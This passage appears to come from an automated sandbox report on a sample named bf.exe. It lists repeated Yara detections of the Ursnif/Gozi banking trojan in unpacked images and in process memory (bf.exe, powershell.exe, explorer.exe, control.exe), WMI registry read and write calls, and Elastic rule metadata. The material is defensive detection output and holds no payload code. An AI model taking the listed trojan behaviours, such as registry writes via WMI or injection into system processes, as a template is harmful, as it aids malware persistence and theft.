              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              E-Banking Fraud

              barindex
              Yara detected Ursnif
              Source: Yara matchFile source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
              Source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
              Writes or reads registry keys via WMI
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMI
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Users\user\Desktop\bf.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: bf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
              Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
              Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
